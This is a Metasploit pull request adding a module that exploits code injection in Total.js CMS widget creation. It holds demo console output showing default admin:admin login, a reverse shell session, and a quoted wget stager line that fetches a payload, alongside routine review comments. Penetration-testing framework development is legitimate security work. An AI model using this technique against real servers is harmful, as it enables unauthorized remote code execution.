Add TotaJS CMS Code Injection in Widget Creation
rapid7/metasploit-framework pull request #12365
Opened 2019-09-25 22:01 UTC by wchen-r7

# Description

Total.js is a Node.js Framework for building e-commerce applications, REST services, real-time apps, or apps for Internet of Things (IoT), etc. Total.js CMS is a Content Management System (application) that is part of the Total.js framework. A commercial version is also available, and can be seen used world-wide.

In Total.js CMS, a user with admin permission may be able to create a widget, and extend CMS functionalities for visitors. However, this can also be abused to upload JavaScript code that will be evaluated server side. As a result, it is possible to embed malicious JavaScript in the new widget, and gain remote code execution.

# Vulnerable Setup

First, please install node. You can do this easily with brew, for example:

```
$ brew install node
```

# Verification

- [ ] Start msfconsole
- [ ] `set rhosts [ip]`
- [ ] `set srvhost [ip]`
- [ ] `set target [id]` (0 = Linux, 1 = Mac)
- [ ] `set payload [payload name]`
- [ ] `run`
- [ ] You should get a session

# Demo

## Check

```
msf5 exploit(multi/http/totaljsms_widget_exec) > check
[*] 192.168.0.21:8000 - The target appears to be vulnerable.
```

## Exploit

```
msf5 exploit(multi/http/totaljsms_widget_exec) > run
[*] Exploit running as background job 37.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.21:4444 
[*] Using URL: http://192.168.0.21:8080/vd9qtAXD
[*] Server started.
msf5 exploit(multi/http/totaljsms_widget_exec) > [*] Attempting to authenticate with admin:admin
[+] Authenticatd as: admin:admin
[*] Creating a widget...
[+] Widget created successfully
[*] 192.168.0.21     totaljsms_widget_exec - 192.168.0.21 requesting: /vd9qtAXD/p_qxVkK
[*] 192.168.0.21     totaljsms_widget_exec - Sending payload to 192.168.0.21
[*] Command shell session 32 opened (192.168.0.21:4444 -> 192.168.0.21:50399) at 2019-09-25 17:00:12 -0500
[*] Finding the payload from the widget list...
[+] Widget cleared successfully

msf5 exploit(multi/http/totaljsms_widget_exec) >
```

2019-10-03 16:38 UTC, wvu requested changes

2019-10-03 16:38 UTC, wvu-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +      'DisclosureDate' => 'Aug 30 2019', # Reported to seclist
ISO format is preferred: `2019-08-30`.

2019-10-03 16:38 UTC, wvu-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +        cmd = "wget #{url} -O #{payload_path} "
Is there a reason you're not using `CmdStager`?

2019-10-03 16:59 UTC, wchen-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +      'DisclosureDate' => 'Aug 30 2019', # Reported to seclist
Ok, I'll fix this. Thanks.

2019-10-03 17:08 UTC, wchen-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +        cmd = "wget #{url} -O #{payload_path} "
Yeah good question. So I guess I could just use a CmdStager and load everything in a Widget, but I simply didn't go for it because I wanted to explore a different way to write a module that requires [HttpClient and HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-module-using-HttpServer-and-HttpClient). If you think we're better off using CmdStager then let me know. Thanks.

2019-10-03 17:09 UTC, wvu-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +        cmd = "wget #{url} -O #{payload_path} "
I mean there are `wget` and `curl` command stagers! They handle `HttpServer` for you.

2019-10-03 17:19 UTC, wvu-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +##
The module name is `totaljsms_widget_exec`. I assume that means Total.js Management System? It seems it'd be more accurate to name this `totaljs_cms_widget_exec`, since it's a CMS (*Content* Management System). Or was this a typo?

2019-10-03 17:25 UTC, wvu requested changes

2019-10-03 17:25 UTC, wvu-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +      'Arch'           => ARCH_X86,
Can you add `ARCH_X64`?

2019-10-03 17:52 UTC, wchen-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +        cmd = "wget #{url} -O #{payload_path} "
oh my. I'll check it out. Thanks.

2019-10-03 18:10 UTC, wvu-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +        cmd = "wget #{url} -O #{payload_path} "
These might be helpful:

https://github.com/rapid7/rex-exploitation/pull/5
https://github.com/rapid7/metasploit-framework/pull/7758
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb

If there's something the existing code can't do, please try to improve it! It's easier to maintain fewer implementations. :)

2019-10-15 15:13 UTC, wchen-r7 commented on modules/exploits/multi/http/totaljsms_widget_exec.rb
> +##
I was thinking totaljsms for its shorter version but now that I think about it, maybe totaljs_cms is more what people would have in mind. Change in the upcoming commit. Thanks!

2019-10-15 19:06 UTC, wchen-r7 commented
I have updated the code. Please let me know if there's anything else I need to change. Thanks!

2019-10-21 20:23 UTC, wvu approved these changes
Thank you!

2019-10-21 20:35 UTC, merged

2019-10-21 20:41 UTC, wvu-r7 commented
# Release Notes

This adds an exploit against the Total.js CMS framework, written in Node.js. A user with administrator credentials may create a new widget containing arbitrary JavaScript code that is evaluated server-side.